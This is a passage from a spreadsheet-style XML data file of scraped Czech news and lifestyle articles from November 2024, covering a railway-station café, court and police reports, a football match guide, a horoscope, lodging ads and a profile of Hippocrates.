    <t>Z bývalé čekárny pro cestující 1. třídy je kavárna s čajem o páté. V secesních prostorech se budete cítit jako na zámku ZDROJ: Foyer Café sdílet: Secesní prostory ve Fantově budově na Hlavním nádraží v Praze se otevřely před několika měsíci veřejnosti. V zrestaurovaném křídle budovy najdete novou kavárnu Foyer Café. Podnik láká na čerstvé pečivo typu viennoiseries, vyladěné kanapky, sendviče na cestu i šampaňské a víno . Klidné posezení v kavárně přímo na nádraží potěší všechny milovníky architektury, gastronomie i samotné cestující. Fantova budova, ve které se kavárna nachází, patří mezi nejzásadnější secesní díla v České republice . Autor budovy hlavního nádraží Josef Fanta spolupracoval také na řadě dalších cenných staveb včetně Rudolfina nebo Národního divadla . Historicky sloužily prostory Foyer Café jako čekárna pro cestující první třídy, poté do nich řadu let nebyl přístup. V roce 2023 Správa železnic dokončila rekonstrukci chráněné kulturní památky, kde se počítalo i s otevřením velkorysých kavárenských prostor. Podívejte se na video z naší návštěvy Foyer Café Skryt pre seznam Kavárny na nádraží mají své vlastní kouzlo Pozorování odjíždějících vlaků, zatímco si vychutnáváte sklenku šampaňského nebo kávu s čerstvým pečivem, má něco do sebe. Foyer Café nabízí francouzské pečivo typu viennoiserie, které každé ráno peče ve vlastní pekárně. Po celý den je vitrína plná lahůdek vlastní výroby: granoly a sendviče, kanapky i dezerty. Do Foyer Café si můžete přijít užít rituál ‚ Čaj o páté ‘ podávaný v krásném českém porcelánu Bernadotte s výběrem šesti druhů kanapek. Od bruschetty s foie gras až po medovou sušenku s kozím sýrem. Pro milovníky vína a šampaňského se chladí více než 50 vín z Itálie , Francie , Španělska a Česka . Foyer Café nabízí degustační balíčky šampaňského a kanapek tří chutí: Czech taste, Art Nouveau, Vegetarian style. Večer kavárna dostává atmosféru koktejlového baru, kde barmani připravují klasické i signature koktejly. A samozřejmě se tady nezapomnělo ani na pivo – na čepu je Plzeň. Provoz Foyer Café zahájila letos gastro eventová skupina SPOJUJEME, do její rodiny patří Restaurace Spojka Karlín , eventové prostory Spojka Events a Endorfin, cateringová společnost a bistro Dark Kitchen. Jak se dostat k Foyer Café Pražáci do Foyer Café trefí určitě, ale ostatní mohou mít s lokalizací trochu problém. Kavárna je přístupná hned z několika míst: ze schodiště vedoucího do Historické budovy, přímo z Wilsonovy ulice z 1. nástupiště Hlavního nádraží ze severního podchodu přes tunel přímo z Vinohrad ze strany z Opletalovy ulice přes vstup do budovy Hlavního nádraží Zdroje: Foyer Café, časopis Apetit Skryt pre seznam Autor: Autor: | karolina.waberova</t>
  </si>
  <si>
    <t>69330</t>
  </si>
  <si>
    <t>74100</t>
  </si>
  <si>
    <t>20241101_255_3243663320_5735779cb58dde4d2be4.html</t>
  </si>
  <si>
    <t>5735779cb58dde4d2be4</t>
  </si>
  <si>
    <t>Krajský soud v Brně zamítnul odvolání muže obžalovaného ze tří přečinů</t>
  </si>
  <si>
    <t>Krajský soud v Brně zamítnul odvolání muže obžalovaného ze tří přečinů Homepage Soudce potvrdil původní rozsudek prostějovského okresního soudu. Foto: Filip Volgemut Brno - Poslední říjnový den se Krajský soud v Brně na Roosveltově ulici zabýval případem odvolání muže z Prostějovska proti rozsudku Okresního soudu v Prostějově . Muž byl obžalován mimo jiné pro porušení vykázaní ze společného bydliště s jeho bývalou manželkou. Muž ve věku padesáti osmi let byl obžalován pro přečiny maření výkonu úředního rozhodnutí, poškození cizí věci a nebezpečné vyhrožování. Obžalovanému hrozil trest až 24 měsíců, okresní soud v původním rozsudku uložil trest ve výši tří čtvrtin, tedy 18 měsíců odnětí svobody do věznice s ostrahou. Muž se proti tomuto rozhodnutí odvolal ke krajskému soudu. Obžalovaný se dopustil opakovaně závažného jednání, když porušil povinnost opustit společné bydlení a jeho okolí a zároveň se zdržet kontaktu s jeho bývalou ženou. Dále se dopustil přečinu nebezpečného vyhrožování, když poškozené během pobytu ve vazbě posílal výhružné dopisy. Také se dopustil jednání, které bezprostředně směřovalo k trestnému činu poškození cizí věci, k jehož dokonání ale nedošlo. Prostějovský okresní soud uložil nepodmíněný trest odnětí svobody na 18 měsíců a také náhradu nemajetkové škody poškozené ve výši 30 000 Kč, náhradu újmy na občanskoprávní řízení ve výši 500 Kč, dále náhradu škody poškozené částkou 60 143 Kč a náhradě škody poškozené pojišťovně částkou 27 857 Kč. Advokátka obžalovaného označila dle jejího názoru délku pobytu ve vězení ve výši tří čtvrtin maximální výše jako nepřiměřeně přísnou, vzhledem k přihlédnutí polehčujícím okolnostem. Navrhla snížení délky trestu s odvoláním na doznání obžalovaného a jeho spolupráci při trestním řízení. Státní zástupce návrhu obhájkyně oponoval s argumenty, že muž byl již dříve trestán za úmyslnou majetkovou trestnou činnost a také zmiňoval velmi nevhodný obsah vzkazů poškozené exmanželce pomocí výhružných dopisů, které jí zasílal během pobytu ve vazební věznici. Soud po krátké poradě vynesl rozhodnutí, ve kterém odvolání zamítá jako nedůvodné a tímto potvrdil rozsudek okresního soudu. Sdílet Odsouzený kriminálník se v neděli večer vloupal do prázdného domu v Kyjově . Vyrušil ho muž, který na dům dohlížel mezitím, co jeho majitelé byli na dovolené.... 1. listopadu 2024 • 23:00 Barevné kostýmy, namalované tváře, spousta alkoholu a hlasitá hudba nebo tradiční den strávený s rodinou zdobením hrobů a vzpomínáním na ty, co už tu s námi... 1. listopadu 2024 • 21:00 1. listopadu 2024 • 18:29 O nás Stisk online je studentský multimediální zpravodajský deník tvořený studenty Katedry mediálních studií a žurnalistiky z Fakulty sociálních studií Masarykovy univerzity Brno v rámci studia jako cvičné médium. Stisk vznikl jako cvičné médium pro studenty už v roce 1997, kdy byl jedním z prvních internetových časopisů v České republice . Na portálu zájemci najdou studentský deník Stisk Online, Rádio Stisk, TV Stisk a také výstupy některých dalších žurnalistických kurzů (s přesahem na sociální sítě). Cílem multimediální dílny je simulace redakčního prostředí, každý student si tak může vyzkoušet všechny základní role při výrobě online zpravodajského či publicistického obsahu i související působení na sociálních sítích a připravit se tak na praxi v různých typech médií. twitter facebook instagram youtube Tiráž Tiskové zprávy a náměty pro tvorbu žurnalistických materiálů pro Online Stisk, Rádio Stisk a TV Stisk zasílejte pouze na e-mail: Všechny žurnalistické materiály jsou zveřejněny podle stejných pravidel jako na kterémkoliv jiném zpravodajském serveru nebo například v novinách, rozhlasovém nebo televizním zpravodajství. Mazání už zveřejněných žurnalistických příspěvků (ani jejich částí) v jakékoli formě není možné nyní ani v budoucnu. Adresa Katedra mediálních studií a žurnalistiky, Fakulta sociálních studií MU, Autor: Filip Volgemut Autor person Filip Volgemut Rubrika transition_slide Homepage</t>
  </si>
  <si>
    <t>20241101_256_3243380400_9dedaf5f46102424d6e9.html</t>
  </si>
  <si>
    <t>9dedaf5f46102424d6e9</t>
  </si>
  <si>
    <t>Na opilce sotva stačil tester, napodruhé ohromená hlídka naměřila přes pět promile Do situace, se kterou se při své práci ještě nikdy nesetkali, přivedl ve čtvrtek v poledne dva brněnské strážníky silně opilý muž. Při dechové zkoušce totiž přístroj po prvním pokusu ukázal, že tak vysokou hodnotu ani nedokáže změřit. Jeho technické maximum se přitom pohybuje okolo šesti promile. Ilustrační snímek | foto: Lukáš Bíba , MAFRA Po chvíli nechala hlídka čtyřiapadesátiletého muže do alkoholtesteru dýchnout znovu. Tentokrát už přístroj reagoval, ukázal extrémní hodnotu 5,38 promile. „Pro nenavyklého člověka může být i smrtelná,“ upozornil mluvčí městské policie Jakub Ghanem. U sebe měl opilec téměř prázdnou láhev vodky, což zřejmě nebyl jediný alkohol , který vypil. Po celou dobu s ním bylo složité mluvit. Během čekání na druhý pokus dechové zkoušky strážníci přivolali záchrannou službu. Zdravotníci si pak muže převzali a po ošetření ho převezli do nemocnice. „Navíc je podezřelý z porušení takzvaného tabákového zákona, protože se v tomto stavu zdržoval na nástupišti hromadné dopravy. Ve správním řízení mu hrozí pokuta do dvaceti tisíc korun,“ uvedl mluvčí. Na strážníky se kvůli opilci obrátila řidička dopravního podniku, muž se v silně podroušeném stavu povaloval u kolejí na tramvajové smyčce v Řečkovicích . I když ho s pomocí cestujícího odtáhla dál od trati, bála se, že by mohl ohrozit svůj život, kdyby se vrátil zpátky. 11. října 2024 KRIMI Sledovat další díly na iDNES.tv Autor: Oldřich Haluza Autor Oldřich Haluza</t>
  </si>
  <si>
    <t>20241101_257_3243531679_2afa206d34cce2bc961c.html</t>
  </si>
  <si>
    <t>2afa206d34cce2bc961c</t>
  </si>
  <si>
    <t>Nákladní vůz naboural a vytlačil osobní vůz ze silnice</t>
  </si>
  <si>
    <t>Nákladní vůz naboural a vytlačil osobní vůz ze silnice Dopravní nehodu se zraněním řidičky šetří v Sukově ulici policisté Autor: Karel Aleš pátek 1. listopadu 11:53, aktualizace 13:10 Doprava Nehody Dnes kolem půl jedenácté dopoledne došlo v Sukově ulici v Plzni ke střetu tahače Mercedes a osobního vozu Volkswagen, který po nehodě skončil proraženými pneumatikami a napříč středovým ostrůvkem. Z místa bylo hlášeno zranění řidičky osobního vozu, takže k nehodě vyjely všechny záchranné složky. Hasiči zajistili prostor nehody a provedli protipožární opatření, zatímco záchranáři si do péče převzali zraněnou ženu, kterou po ošetření na místě transportovali do nemocnice. Podle informací z místa došlo k nehodě tak, že řidič nákladního vozu jedoucí v levém pruhu směrem od Folmavské ulice kvůli probíhajícímu sekání středového ostrůvku přejížděl do pravého pruhu, ale přehlédl při tom souběžně jedoucí osobní vůz, narazil do jeho zadního blatníku a doslova ho obtočil kolem předku svého vozu, načež byl osobní vůz odhozen na středový ostrůvek, kde si prorazil obě pravá kola. Okolnosti nehody na místě šetří policisté, zatím je možné pouze uvést, že řidič i řidička měli negativní dechové zkoušky na alkohol a že škoda bude vzhledem k tomu, že šlo o zcela nový nákladní vůz, zřejmě opravdu vysoká. Nehoda blokuje levý pruh ve směru ke Klatovské třídě, místo je ale s opatrností průjezdné. Autor: Karel Aleš Autor person Karel Aleš</t>
  </si>
  <si>
    <t>20241101_258_3243334953_c5b2bc3cb89b3c3864d2.html</t>
  </si>
  <si>
    <t>c5b2bc3cb89b3c3864d2</t>
  </si>
  <si>
    <t>Organizační info před Baníkem</t>
  </si>
  <si>
    <t>Organizační info před Baníkem Důležité informace k dalšímu ligovému střetnutí Sdílet Publikováno Utkáním s Baníkem pokračuje série tří domácích zápasů v rozmezí osmi dnů. Ostravského rivala přivítáme v rámci čtrnáctého kola nejvyšší soutěže v sobotu 2. listopadu od 19:00. Stadion pro vás bude otevřen tradičně 90 minut před zápasem. Další důležité předzápasové informace najdete v tomto článku. Zápas: AC Sparta Praha – FC Baník Ostrava Datum: 2. 11. 2024 Soutěž: Chance Liga, 14. kolo Otevření stadionu: 17:30 Výkop: 19:00 Stadion: epet ARENA Vstupenky: utkání je vyprodané! Dejte si pozor na neoprávněný prodej vstupenek. Může se jednat o podvod! Přímý přenos: O2 TV Sport, Betano Rozhodčí: D. Černý – J. Kříž, P. Caletka (V. Zaoral) | VAR: O. Berka | AVAR: M. Vlček Kurzy Betano: 1.45 – 4.40 – 6.40 (další sázkové příležitosti k zápasu najdete ZDE ) Parkování: na Letenské pláni, doporučujeme fanouškům při cestě na stadion využít městskou hromadnou dopravu Zrušení PDF vstupenek Od poloviny října 2024 došlo ke změně ve způsobu, jakým se fanoušci dostanou na stadion. Vstup na utkání je možný pouze s digitální vstupenkou uloženou v aplikaci Sparta . Vstupenky tak po zakoupení již nejsou rozesílány e-mailem ve formátu PDF. Více informací k této změně najdete v následujících článcích: Informace ke zrušení PDF vstupenek Tisk vstupenek na stadionu Nová Wi-Fi síť SPARTA- APP Zobrazení QR kódů v aplikaci dvě hodiny před zápasem Přijďte včas Souboj s naším tradičním rivalem z Ostravy se vždy těší velkému zájmu diváku. Proto vám doporučujeme dorazit na Letnou včas, ať vám nic neunikne a mohli jste podpořit hráče již při nástupu na rozcvičku v 18:20. Užijte si předzápasový program Těšit se můžete na tradiční ČSOB Kahoot kvíz nebo T-shirt gun s Rudym. Společně popřejeme k významným jubileím Vladimíru Labantovi a Borisi Kočímu . Před výkopem pak minutou potlesku uctíme památku sparťanů, kteří nás v posledních měsících opustili. Staropramen z tanku Od startu sezony jsme si pro vás ve spolupráci se Staropramenem připravili jednu novinku. Ve vybraných stáncích domácích sektorů epet ARENY se můžete těšit na čepované pivo z tanku. K dispozici jsou nově také tupláky, tedy litrové kelímky. Pořiďte si sparťanský merch Zastavte se v našem fanshopu, který pro vás bude otevřen tři hodiny před začátkem zápasu, a také hodinu po jeho skončení. Stánek se sparťanskými produkty můžete zároveň navštívit přímo na stadionu na vstupu A. Tíží vás něco? Odložte si v úschovně Máte možnost využít služeb úschovny, která se nachází na Letenské pláni přímo naproti stadionu. Otevřena bude hodinu a půl před výkopem, zavírat bude hodinu po konci zápasu. Cena se odvíjí dle typu a velikosti uložené věci, platit se dá v hotovosti i kartou. drobné předměty 50,- Kč/ks (deštník, selfie tyč, spreje, parfémy, kapesní nůž apod.) zavazadlo 100,- Kč/ks (batoh, taška, laptop apod.) Pozor: Do epet ARENY vás vpustí pouze s nezbytně nutnými osobními věcmi. Nenoste s sebou prosím tedy předměty, které na stadion nepatří. Jedná se zejména o předměty, které nemůžete mít po celou dobu utkání při sobě. Odkládaní jakýchkoli předmětů do uliček a prostoru schodiště je nepřípustné. Pokud přijdete například s notebookem nebo středně velkým zavazadlem, je na individuálním posouzení bezpečnostní služby stadionu, zda budete na stadion vpuštěni. Podpořte Nadační fond ACS , nebo tvorbu chorea Po celém stadionu najdete nové sběrné boxy na vratné kelímky. Vhozením kelímku do jedné, či druhé části boxu můžete přispět padesáti korunami na fanouškovský choreo fond, nebo na Nadační fond ACS . Kelímky je samozřejmě nadále možné vrátit na určených místech, a získat tak zálohu zpět. Fanděte ze svého místa Sledujte utkání z místa, které máte napsané na své vstupence. Nezdržujte se na schodech a neblokujte prosím přístup na tribunu. Máte zdravotní omezení? Kontaktujte nás Potřebujete-li ke svému pohybu zdravotnickou pomůcku, například berle, kontaktujte nás s dostatečným předstihem na e-mail bezbarier@sparta.cz, abychom pro vás mohli vyčlenit vstupenky do míst, které jsou vyhrazeny pro osoby se sníženou motorikou či jinými zdravotními problémy. Pokud tak neučiníte, vystavujete se riziku, že z důvodu vaši bezpečnosti a bezpečnosti ostatních diváků nebude možný váš přesun na daná místa a nebudete na stadion vpuštěni. Sdílet</t>
  </si>
  <si>
    <t>20241101_259_3243334864_db8c3735fc949655ba58.html</t>
  </si>
  <si>
    <t>db8c3735fc949655ba58</t>
  </si>
  <si>
    <t>Přijede na bílém koni?</t>
  </si>
  <si>
    <t>Shrnutí Přijede na bílém koni? Svatomartinský průvod na Karlově mostě V listopadu obvykle už vyhlížíme první sněhové vločky. Bývávalo, že se objevily kolem svátku sv. Martina . Kdo ví, jak to bude letos. Každopádně se ale můžeme pokusit bílou nadílku přivolat účastí ve svatomartinském průvodu přes Karlův most . Tato připomínka starých tradic ožívá vždy 11. listopadu. Co takový svatomartinský průvod obnáší? Hlavní postavou je přirozeně svatý Martin , jedoucí na pověstném bílém koni. Světec, kdysi voják, poté kněz a nakonec biskup, přijede v oděvu římského vojáka tak, jak dle legendy daroval žebrákovi polovinu svého pláště, aby ho ochránil před zimou. Ve svatomartinském průvodu však půjde i jedenáct husopasek, které před sebou poženou jedenáct hus. I ty by mohly být považovány za symbol nadcházející zimy, jejíž chladné noci bývalo vždy nejlépe strávit pod peřinou z husího peří, a připravit se na ni dobrou husí pečínkou. Ať bude počasí jaké bude, v tomto průvodu se tradice naplní, protože setnina římských vojáků, kteří budou jeho součástí, poveze sníh na koňském povozu. K starodávné tradici svátku sv. Martina však ve 20. století přibyla ještě nová. I tu průvod připomene – a sice květem vlčího máku. Tento den, 11. listopad, se totiž zároveň připomíná i jako Den válečných veteránů. Kdo se k průvodu, přes Karlův most přidá, a dojde s ním na Křižovnické náměstí , může tu shlédnout i představení středověkého divadla, dopřát si něco ze svatomartinských dobrot, které tu bude nabízet malý trh, a svlažit hrdlo novým, svatomartinským vínem z mělnických vinic, kterému požehná velmistr Rytířského řádu Křižovníků s červenou hvězdou. A kdy že se to vše odehraje? V sobotu 11. 11. v 11 hodin, 11 minut, kdy se průvod vydá na cestu od 11. pilíře Karlova mostu.</t>
  </si>
  <si>
    <t>294</t>
  </si>
  <si>
    <t>188</t>
  </si>
  <si>
    <t>20241101_26_3264673076_0070d0f73539703eb992.html</t>
  </si>
  <si>
    <t>0070d0f73539703eb992</t>
  </si>
  <si>
    <t>Denní horoskop na sobotu 2. 11. 2024: Ryby mají co dohánět, Váhy se vydají špatnou cestou</t>
  </si>
  <si>
    <t>Denní horoskop na sobotu 2. 11. 2024: Ryby mají co dohánět, Váhy se vydají špatnou cestou Denní horoskop pro všechna znamení zvěrokruhu na sobotu 2. 11. 2024. Podívejte se, co vás tento den čeká a čeho byste se případně měli vyvarovat. Vodnář (21. 1. – 20. 2.) Tempo, jakým měníte své názory a nálady, je vskutku ohromující. Ostatní s vámi v tomto ohledu jen těžko budou držet krok. Snažte se alespoň vyvarovat zásadních rozhodnutí . Ryby (21. 2. – 20. 3.) Až budete mít hotové všechny povinnosti, uskutečněte dlouho odkládané setkání s přáteli. Máte opravdu co dohánět , konverzace s nimi vám prospěje, o zábavu nouze nebude. Večer se může protáhnout. Beran (21. 3. – 20. 4.) Máte tendenci být přecitlivělí a vůbec nevíte, co se to s vámi děje. Nesmíte se hlavně litovat, to ještě nikomu nepomohlo. Když budete pociťovat únavu, v klidu a bez výčitek si odpočiňte. Býk (21. 4. – 21. 5.) Horoskop vám radí, ať si dáte pozor na přílišnou důvěřivost . Poslední dobou jste v tvrdě pracovali a zasloužíte si uznání. Myslete také na své zdraví. Pokud vás něco bolí, raději si zajděte k lékaři. Blíženci (22. 5. – 21. 6.) Měli byste se soustředit na praktické záležitosti , organizování a detailní práci. Je potřeba, abyste byli efektivní a neplýtvali časem svým ani ostatních lidí. Vyvarujte se intrik a manipulace. Rak (22. 6. – 22. 7.) Nabudete sebevědomí díky rozhovoru, kterého jste se obávali. Všechno ale dopadne výtečně, přesně podle vašich vytoužených představ. Tento úspěch vám pomůžete zrealizovat vaše plány. Lev (23. 7. – 22. 8.) Nastává čas na sebereflexi . Zamyslete se nad svým chováním a jednáním z posledních dnů. Buďte vstřícní k ostatním, zajímejte se o jejich názory, dejte jim možnost, aby se vyjádřili. Panna (23. 8. – 22. 9.) Horoskop vás upozorňuje na náročnější den . Nic nového nezačínejte, nápady si uchovejte na příznivější dobu. Pokud je to možné, zdržujte se spíše doma. Pozor si dejte na lidi pod vlivem alkoholu . Váhy (23. 9. – 23. 10.) Horoskop vás varuje, ať neutrácíte peníze za věci, jimiž si chcete koupit přízeň druhých lidí. Tudy cesta nevede , aspoň ne ta upřímná a dlouhodobá. Musíte se na to podívat z jiného úhlu. Štír (24. 10. – 22. 11.) Snažte se přijímat zodpovědnost za své činy . Co se jednou slíbí, to by se také mělo splnit, myslete na to. Komunikujte více s ostatními, nebraňte se ani rozhovorům s cizími lidmi, budou pro vás přínosné. Střelec (23. 11. – 21. 12.) Horoskop říká, ať se nestresujete z toho, že všechno nestíháte tak rychle, jak chcete . Je důležité, abyste se nehroutili z drobných neúspěchů, neboť právě ty jsou vaším hnacím motorem. Kozoroh (22. 12. – 20. 1.) Mějte na paměti, že respekt si u dotyčného člověka nezískáte tím, že se budete neustále jen přizpůsobovat. Buďte sami sebou a dělejte věci tak, jak to cítíte, přetvařováním nezískáte vůbec nic. Chcete-li znát vaše šťastné číslo pro tento den, podívejte se do naší fotogalerie . Luděk Staněk poodhalil zákulisí Zrádců: Bylo to jako ve vězení a strašně na bednu Autor: Josef Onderka Autor person Josef Onderka Rubrika transition_slide denní horoskopy</t>
  </si>
  <si>
    <t>553210</t>
  </si>
  <si>
    <t>276130</t>
  </si>
  <si>
    <t>20241101_260_3243335481_f4ca2798468ac70fda85.html</t>
  </si>
  <si>
    <t>f4ca2798468ac70fda85</t>
  </si>
  <si>
    <t>St. Antonius, spol. s r.o.</t>
  </si>
  <si>
    <t>St. Antonius, spol. s r.o. 602188672 st-antonius@seznam.cz www.saint-antonius.com Hotel Saint Antonius nabízí ubytování s možností ubytování s domácími mazlíčky v Mariánských Lázních s bezplatným Wi-Fi a terasou. Každý pokoj je vybaven TV. Všechny pokoje jsou vybaveny vlastním sociálním zařízením, vanou nebo sprchovým koutem. Na webu získáte veškeré informace a kontakty. Ubytování Družstevní 104, 692 01 Pavlov +420 702 499 537 Ubytování Pavlov u Mikulova Penzion Pollau v malebné vinařské obci Pavlov na Pálavě nabízí příjemné ubytování v domácím prostředí. Útulný rodinný penzion se nachází přímo v centru Pavlova , přitom jen několik desítek metrů od vinohradů. Ubytování je zde možné ve třech dvoulůžkových pokojích se společným sociálním zázemím, vybavenou kuchyňkou a posezením na zahradě. Návštěvníci penzionu mohou také posedět v místním vinném sklípku. Zámecká 120, 696 05 Milotice u Kyjova +420 728 037 845 Chcete zažít krásné chvíle v kraji vína , krojů a folkloru? Nově zrekonstruovaný Penzion u zámku v Miloticích u Kyjova vybízí návštěvníky k objevování krás Jižní Moravy i k odpočinku těla i duše. Penzion u zámku Milotice disponuje kapacitou 28 lůžek v 7 pokojích se sociálním zařízením a kompletně vybavenou společnou kuchyňkou. Ubytování v Miloticích u Kyjova Nově zrekonstruované ubytovací zařízení Penzion u zámku leží v Miloticích u Kyjova v oblasti kyjovského Dolňácka. Oblast je vyhlášeným krajem vína , krojů a folkloru. Penzion je vynikající výchozí lokalitou pro ty, kteří chtějí poznat krásy Jižní Moravy . Návštěvníci mohou navštívit místní zámek v Miloticích nebo barokní kostel ve středu obce. Rovněž si mohou udělat odpolední procházku do přírody, ať už do chráněné rezervace Písečný rybník či přírodní rezervace Horky. Ubytování v Penzionu u zámku Milotice je ideální pro rodiny s dětmi, páry i přátele. Penzion s kapacitou 28 lůžek Penzion u zámku s kapacitou 28 lůžek v 7 pokojích sídlí v budově, z historického hlediska spjaté s milotickým zámkem. Zatímco v minulosti sloužila budova jako vrchnostenská kancelář tehdejšího panství, dnes poskytuje útulné přístřeší pro návštěvníky. Součástí ubytování je přístup do společné kuchyně s veškerým vybavením včetně varné desky, lednice, mikrovlnné trouby či lednice. Parkování aut je možné v uzavřeném dvoře za penzionem s úschovnou kol, dětským hřištěm i venkovním posezením s krbem. Dobrá dostupnost v klidné lokalitě Penzion u zámku Milotice leží u hlavní silnice ve směru Kyjov - Hodonín . Nachází se tak na dobře dostupném, přesto však klidném místě obklopeném nádhernou přírodou. Kyjov a okolí patří rovněž mezi místa s bohatou kulturní činností. Penzion je současně ideálním ubytovacím zařízením pro ty, kteří se chtějí zúčastnit tradičních akcí – dětských dnů, burčákového pochodu, vinobraní apod. Nezáleží, pro kolik osob potřebujete ubytování. V penzionu jsou totiž různě členěné pokoje s 2, 3, 4 a 5 lůžky. Hotel Alpenhof ***+ ubytování rakouských v Alpách, Semmering Am Alpenhof 1, 8685 Steinhaus am Semmering Rakousko Ubytování v rakouských Alpách Hotel Alpenhof ***+ nabízí ubytování ve známém alpském středisku Semmering za bezkonkureční ceny. Je dokonalou symbiózou klidu a odpočinku na jedné straně a široké nabídky různých aktivit na straně druhé. Hotel oceňují sportovci, rodiny s dětmi i lidé preferující "pouze" příležitost vychutnávat pohodlí a zázemí, které hotel nabízí. Má také skvělou výchozí pozici pro nadšence lyžování v Alpách. Ladislav Arenberger: Pronájem chaty u rybníka Podřezanský na Třeboňsku U rybníka Podřezanský, 2 km od obce Cep Máte rádi malebnou jihočeskou krajinu a hledáte vhodné ubytování pro dovolenou? Pro tyto účely je ideální pronájem rekreační chaty poblíž obce Cep u rybníka Podřezanský, nedaleko města Třeboň . Objekt je po rekonstrukci a poskytuje klid pro nerušený odpočinek během celého roku. Ubytovat se zde může až 6 osob a kromě chaty je možné využívat travnatou pláž, kde je kromě pohodlného přístupu k rybníku také prostor pro posezení a ohniště. Pronájem chaty pro skvělou dovolenou Chata Cep je oblíbeným místem, kam se hosté rádi vracejí. Mají zde totiž vše, co pro komfortní a pohodlnou rekreaci potřebují. Pronájem chaty umožňuje ubytování až 8 osob, příp. i 2 dětí a na zahradě je možné postavit i stan. K dispozici je rovněž garáž. V patře jsou dva neprůchozí pokoje s televizním přijímačem, jeden je vybaven manželskou postelí a druhý dvěma válendami. V ložnici se nachází velké letiště s prostorem pro 2 dospělé osoby a 2 děti. Další dvoulůžko se dá vytvořit v obývacím pokoji z rozkládací sedačky. Komfortní a plně vybavené ubytování Obývací pokoj nabízí také posezení u krbu s teplovzdušnými rozvody, což hosté ocení v zimních a podzimních dnech. I tehdy má totiž krajina okolo Třeboně své kouzlo! V obývacím pokoji najdou rovněž televizi, rádio a jídelní stůl s rohovou lavicí. Kuchyňka je vybavena lednicí s malým mrazákem, mikrovlnnou troubou, elektrickým sporákem a také potřebným nádobím i příbory. V jejím sousedství je dále menší praktická šatna, koupelna disponuje novým sprchovým koutem a WC. Pronájem chaty u rybníka Podřezanský je tak opravdu komfortním typem nejen letního rekreačního ubytování. Mnoho možností k trávení volného času Na zahradě kromě ohniště a posezení potěší rekreanty nafukovací bazén. V chatě je k dispozici pitná voda z vlastní studny. V okolí je pak spousta možností k výletům. Například Třeboň se svými historickými památkami, na celodenní výlet mohou hosté vyrazit například do Českého Krumlova , Hluboké nad Vltavou anebo Jindřichova Hradce . V okolí chaty je mnoho příležitostí k rybaření a také síť turistických tras a cyklostezek. Pokud jste nenašli volný termín, nabízím ubytování od.1.6.2020 přímo na kraji Suchdola - nyní prochází rekonstrukcí, bude ve stejném duchu, jen trochu menší. Jedná se o ubytování v Jižních Čechách - pronájem chatky se zahradou pro až 2-5 osob, v Suchdole nad Lužnicí. Chata Cep Autor: propeople s.r.o.</t>
  </si>
  <si>
    <t>5270</t>
  </si>
  <si>
    <t>3590</t>
  </si>
  <si>
    <t>20241101_261_3243335574_64606f26f5558fee7500.html</t>
  </si>
  <si>
    <t>64606f26f5558fee7500</t>
  </si>
  <si>
    <t>Hippokrates: Otec západní medicíny</t>
  </si>
  <si>
    <t>Hippokrates: Otec západní medicíny Petr Matura 1.11.2024 Hippokrates (460 př. n. l.-cca 370 př. n. l.), nejslavnější lékař starověku, jehož přičiněním se lékařství stalo samostatným oborem, mimo jiné položil i základy klinického lékařství. Jeho jméno je spojováno rovněž s textem obsahujícím základní etické principy lékařského povolání. Hippokrates tak v podstatě sestavil etické zásady lékařů, takzvanou Hippokratovu přísahu, na kterou lékaři přísahají až do dnešních dnů… Osud předem daný? Svůj lékařský osud měl tento zakladatel lékařské vědy snad již předurčen, neboť se narodil do lékařské rodiny, odvozující svůj původ od Asklepia, údajného řeckého léčitele, který měl žít ve 13. století př. n. l. Hippokratova rodina odvozovala svůj původ od samotného Asklepia. Nemoc není božím trestem V mládí Hippokrates procestoval celé Řecko , Malou Asii a zřejmě i část Egypta , kde se zdokonaloval v lékařském umění. Do tehdejšího starověkého Řecka právě Hippokrates vnesl revoluci v dosavadním pojetí medicíny. Tvrdil, že nemoc není trestem seslaným bohy, nýbrž výsledkem působení stravy, prostředí a životních návyků. Nemoc tedy v jeho pojetí měla zcela přirozené příčiny. Hippokrates k tomu mimo jiné údajně říká: „ Jez proto, abys žil. Nežij proto, abys jedl.“ Medicína jako celostní obor V léčbě Hippokrates zastával filozofii využití léčivých sil přírody, bylin a samotného pacientova těla. Hippokratovská medicína byla tak v podstatě celostním oborem, kdy pacient býval považován za nedílnou součást přírody, jež prý sama o sobě už disponuje velkou léčivou silou. Sám Hippokrates prý prohlásil: „ Koho neuzdraví léky, toho uzdraví příroda.“ Text Hippokratovy přísahy v rukopisu z 12. stol. ( Řím , Vatikán ) Léčba na základě zkušeností V tomto duchu Hippokrates založil též svoji vlastní lékařskou školu. Velký důraz kladl na prognózu budoucího průběhu nemoci, který byl odhadován díky pečlivým záznamům předchozích případů. Na základě průběhu nemoci pak Hippokrates volil různou intenzitu lékařských zákroků. Hippokratova socha v Národním lékařském centru Siglo XXI, Cuauhtémoc, Mexico City Čistota – půl zdraví Byl také horlivým propagátorem čistoty během práce s pacienty, a to samozřejmě ještě dávno před objevením choroboplodných zárodků. Pacienty chtěl udržovat v poměrně sterilním prostředí. Rány nemocným omýval čistou vodou nebo vínem . Zdroje informací: zivotopisyonline.cz, cs.wikipedia.org, kos-web.cz Foto: Bělorusko 2578 řekl:, CC BY-SA 4.0, via Wikimedia Commons, Neapolské národní archeologické muzeum, CC BY 2.5, via Wikimedia Commons, rukopis:Neznámý autorUnknown author sken použitý v knize: Foto de la Biblioteca Vaticana sken z knihy: User:Rmrfstar, Public domain, via Wikimedia Commons, ProtoplasmaKid, CC BY-SA 4.0, via Wikimedia Commons Právě v prodeji Autor: Petr Matura Autor person Petr Matura</t>
  </si>
  <si>
    <t>20241101_262_3243322000_1629b7ef0cd6c4d4ce09.html</t>
  </si>
  <si>
    <t>1629b7ef0cd6c4d4ce09</t>
  </si>
  <si>
    <t>Guinness nově i v nealko verzi</t>
  </si>
  <si>
